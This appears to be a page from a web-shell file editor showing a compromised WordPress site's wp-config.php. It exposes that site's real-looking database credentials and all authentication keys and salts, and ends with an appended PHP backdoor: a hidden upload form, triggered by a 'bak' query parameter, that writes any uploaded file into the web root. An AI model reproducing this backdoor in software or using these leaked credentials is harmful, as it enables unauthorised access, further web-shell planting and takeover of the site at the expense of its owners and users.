Edit file File name : wp-config.php Content :<?php define('WP_CACHE', true); // Added by FlyingPress /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_dspah'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_nazsz'); /** Database password */ define('DB_PASSWORD', 'FfdR5R!h*8hQ5a7o'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'AD92m05u82ft*9xt%0kr0bIt3FS%i854V5[iVg9O1dZSgo/lAJ[1zvA]:6ymZ1;N'); define('SECURE_AUTH_KEY', ';2Rb:ie~PDg#94~XHaDzD%!-IQ1-mXo~4h&0s3y28);j3LxOF_9@8u6I[N7p(m43'); define('LOGGED_IN_KEY', ']C0@0r&Kv]u(+EU-SB-aJ3&7Gy3;U%%Mt8-Y+6gl2n]F8sY6op6vH@l+xo)IfVZv'); define('NONCE_KEY', 'w[_&)%bRklxC&M6Ci:a8Be5YTZC89)J:[AiJ7LhZ5+GTr4097Q*tO1|;zK|Bl0_E'); define('AUTH_SALT', 'nn:k+__O094@3Fz6:8RtK|~jG%]1r(_iEj@HX;4#Z#LDfEAa8Wy|Ni7[k~66R2NB'); define('SECURE_AUTH_SALT', '#*V3rqu](56*ykL!1N)0]Z450;cnL&3(#6~+8n|l~8qw_t6yQ30y4lt/mQdRz[I2'); define('LOGGED_IN_SALT', 'W([H0iDy%tW8E]g3iiB8Q5dS01509xY!x[~sEWau1*iTc_hdX)LT0W@03%19%x#X'); define('NONCE_SALT', 'p)1-!r_:jGr09pkQ]63ZK&4~9o&*TzO_*:Y:h9&fr6|s5a(UaS|V1AUe*-%Y)J[G'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'xlcxeXWV_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'DISALLOW_FILE_EDIT', true ); define( 'CONCATENATE_SCRIPTS', false ); define( 'WP_CACHE_KEY_SALT', '375508a50e5f4501b55dbbb15d4cb275' ); define( 'WP_DEBUG_DISPLAY', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?> Save